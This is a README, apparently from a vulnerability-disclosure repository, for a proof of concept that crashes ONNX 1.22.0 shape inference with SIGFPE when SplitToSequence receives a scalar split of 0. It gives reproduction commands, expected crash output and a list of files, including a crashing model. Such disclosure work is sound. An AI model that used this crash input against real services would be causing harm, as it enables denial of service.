ONNX SplitToSequence scalar split=0 SIGFPE PoC
This repository contains the proof of concept and evidence files for an ONNX
SplitToSequence shape-inference crash.
Summary
A checker-passing ONNX model can set the optional SplitToSequence split
input to a scalar INT32 initializer with value 0. ONNX shape inference then
evaluates splitDimValue % splitSizes[0] in native code without checking that
the scalar split value is positive. This terminates the process with SIGFPE.
Tested package:
onnx==1.22.0
numpy==1.26.4
Reproduce
python3 -m venv /tmp/onnx-split-poc
/tmp/onnx-split-poc/bin/python -m pip install --upgrade pip
/tmp/onnx-split-poc/bin/python -m pip install -r requirements.txt
/tmp/onnx-split-poc/bin/python onnx_split_to_sequence_zero_split_sigfpe_poc.py --out-dir /tmp/onnx-split-poc-output
Expected result:
== control_split_2.onnx split=2 ==
loaded=control_split_2.onnx
checker_passed
shape_inference_returned
returncode=0
== malicious_split_0.onnx split=0 ==
loaded=malicious_split_0.onnx
checker_passed
Fatal Python error: Floating point exception
...
returncode=-8
For native debugger capture:
gdb --args /tmp/onnx-split-poc/bin/python onnx_split_to_sequence_zero_split_sigfpe_poc.py --out-dir /tmp/onnx-split-poc-output --direct-crash
Files
onnx_split_to_sequence_zero_split_sigfpe_poc.py- repeatable PoC.control_split_2.onnx- valid control model using scalarsplit=2.malicious_split_0.onnx- checker-passing crash model using scalarsplit=0.record-demo-output.txt- recorded PoC output.gdb-backtrace.txt- native backtrace showingSIGFPE.source-sequence-utils-v1.22.0.txt- vulnerable release source snippet.source-sequence-utils-main.txt- currentmainsource snippet.duplicate-check.md- public duplicate check notes.duplicate-check-playwright.json- raw Huntr dedup checker output.environment.txt- tested environment.SHA256SUMS.txt- file hashes.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support